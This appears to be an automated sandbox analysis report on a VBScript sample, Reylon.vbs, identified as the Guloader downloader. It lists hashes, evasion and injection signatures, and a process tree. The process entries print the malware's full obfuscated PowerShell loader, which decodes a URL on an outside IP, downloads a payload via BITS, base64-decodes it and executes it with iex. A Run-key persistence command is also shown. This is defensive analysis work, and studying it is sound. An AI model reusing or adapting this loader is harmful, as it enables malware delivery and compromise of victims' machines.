Analysis
- max time kernel: 150s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-20230703-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 12/07/2023, 09:23
Static task: static1
Behavioral task: behavioral1
- Sample: Reylon.vbs
- Resource: win7-20230705-en
Behavioral task: behavioral2
- Sample: Reylon.vbs
- Resource: win10v2004-20230703-en
General
- Target: Reylon.vbs
- Size: 16KB
- MD5: 5fcc423dd95776e7ce18ea1804b27118
- SHA1: 85bbd202a7a2919cb4733c564dfd7c3ae2319510
- SHA256: 82b08d87211f44c871d681e216fcd8ae33f485af2f6737011f187c5a56ac8c56
- SHA512: 63c9f5e642da7de4d6aab845e3f9940bf23b13fd75be8cd55b4639a688a840b01ec2b7e7c42eba22347ab5061d1a5a0ba55bb528ac779d9e7820e324af83483f
- SSDEEP: 384:cEYCB7v5QM+PUiStGvDQzX4FG0NClMgW8Q2T:c5CDkLKbW8zT
Malware Config
Signatures
- Guloader,Cloudeye
  A shellcode based downloader first seen in 2020.
- Blocklisted process makes network request (1 IoCs)
  flow | pid | Process
  5 | 1740 | WScript.exe
- Checks QEMU agent file (2 TTPs, 2 IoCs)
  Checks presence of QEMU agent, possibly to detect virtualization.
  description | ioc | Process
  File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | powershell.exe
  File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | ieinstal.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation | WScript.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Software\Microsoft\Windows\CurrentVersion\Run | ieinstal.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" | ieinstal.exe
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  pid | Process
  3368 | ieinstal.exe
  3368 | ieinstal.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid | Process
  1580 | powershell.exe
  3368 | ieinstal.exe
- Suspicious use of SetThreadContext (1 IoCs)
  description | pid | Process | procid_target
  PID 1580 set thread context of 3368 | 1580 | powershell.exe | 107
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid | Process
  3396 | powershell.exe
  3396 | powershell.exe
  1580 | powershell.exe
  1580 | powershell.exe
  1580 | powershell.exe
- Suspicious behavior: MapViewOfSection (1 IoCs)
  pid | Process
  1580 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 3396 | powershell.exe
  Token: SeDebugPrivilege | 1580 | powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoCs)
  pid | Process
  3368 | ieinstal.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  description | pid | Process | procid_target
  PID 1740 wrote to memory of 3396 | 1740 | WScript.exe | 99
  PID 1740 wrote to memory of 3396 | 1740 | WScript.exe | 99
  PID 3396 wrote to memory of 1580 | 3396 | powershell.exe | 101
  PID 3396 wrote to memory of 1580 | 3396 | powershell.exe | 101
  PID 3396 wrote to memory of 1580 | 3396 | powershell.exe | 101
  PID 1580 wrote to memory of 3368 | 1580 | powershell.exe | 107
  PID 1580 wrote to memory of 3368 | 1580 | powershell.exe | 107
  PID 1580 wrote to memory of 3368 | 1580 | powershell.exe | 107
  PID 1580 wrote to memory of 3368 | 1580 | powershell.exe | 107
Processes
[1] C:\Windows\System32\WScript.exe (PID: 1740)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 3396)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (PID: 1580)
        Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"
        - Checks QEMU agent file
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Program Files (x86)\internet explorer\ieinstal.exe (PID: 3368)
          Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          - Checks QEMU agent file
          - Adds Run key to start application
          - Suspicious use of NtCreateThreadExHideFromDebugger
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 60B
- MD5: d17fe0a3f47be24a6453e9ef58c94641
- SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
- SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
- SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82